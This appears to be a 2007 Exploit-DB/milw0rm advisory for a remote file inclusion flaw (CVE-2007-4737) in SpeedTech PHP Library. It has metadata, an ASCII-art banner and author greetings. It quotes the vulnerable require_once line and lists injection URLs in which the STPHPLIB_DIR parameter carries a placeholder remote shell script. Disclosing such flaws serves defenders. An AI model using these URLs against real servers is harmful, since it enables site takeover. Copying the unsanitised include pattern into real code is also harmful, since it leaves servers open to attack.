STPHPLibrary (STPHPLIB_DIR) Remote File Inclusion Vulnerability

  • EDB-ID: 4358
  • CVE: 2007-4737
  • OSVDB-ID: 38929
  • Author: leetsecurity
  • Published: 2007-09-03
  • Verified: Verified
  • Exploit Code:   Download
  • Vulnerable App:    N/A
Next Exploit Previous Exploit Home
?????__________________________________________?????
????????_____________________________________???????
???????????_________________________________????????
??????????????_____________________________?????????
????????????????__________________________??????????
???????????????????______________________???????????
?????????????????????___________________????????????
??????????????????????_________________?????????????
????????????????????????_______________?????????????
??????????????????????????_____________?????????????
___?????????????????????????__________??????????????
_____?????????????????????????________??????????????
________???????????????????????_______??????????????
___________??????????????????????_____??????????????
________________???????????????????___??????????????
_____________________???????????????__??????????????
___________________________????????????????????????_
_____________________???????????????????????????____
______________???????????????????????????????_______
___________???????????????????????????????????______
________????????????????????????????????????????____
______????????_____??????????????????????????????___
____?????????_______??????????????????????????????__
__???????????_______???????????????????????????????_
_?????????????_____?????????????????????????????????
????????????????????????????????????????????????????
????????????????????????????????????????????????????
????????????????????????????????????????????????????
????????????????????????????????????????????????????
_??????????????????????????????????????????????????_
__?????????????????????????????????????????????????_
_____?????????????????????????????????????????????__
_________????????????????????????????????????????___
_______________??????????????????????????????????___
_________________???????????????????????????????____
_________________???????????????????????????________
________________??????????_____??????????___________
_________________?????_________?????_________?????__
__________????_________????____________?????????____
__________?????????????????_____??????????__________
__________?????????????????___?????_________________
__________?????______??????_________________________

# SpeedTech PHP Library  <=  Remote File Inclusion Vulnerability
#
#Dork::(
#
#Vuln Code
##############################################################################################
#ERROR1:stphpapplication.php
#require_once("$STPHPLIB_DIR/stphpobject.php");<<< rfi coded.
#
#Other Files:
#   stphpapplication.php?STPHPLIB_DIR=[[Sh3LLScript]]
#   stphpbtnimage.php?STPHPLIB_DIR=[[Sh3LLScript]]
#   stphpform.php?STPHPLIB_DIR=[[Sh3LLScript]]
#   ........................................
#   ........................................
#   ........................................
##############################################################################################
#
#http://php.html.it/script/vedi/1872/stphplibrary/
#
##############################################################################################
#
#LEETSECURITY.ORG <<<< sanal alemde bizde varýz...
############################################################################################
#coded by ..Wocker..
#
#####special thanx:###..Str0ke..####..KEZZAP66345..####..Wocker..#############################
##############################################################################################
##############################################################################################

# milw0rm.com [2007-09-03]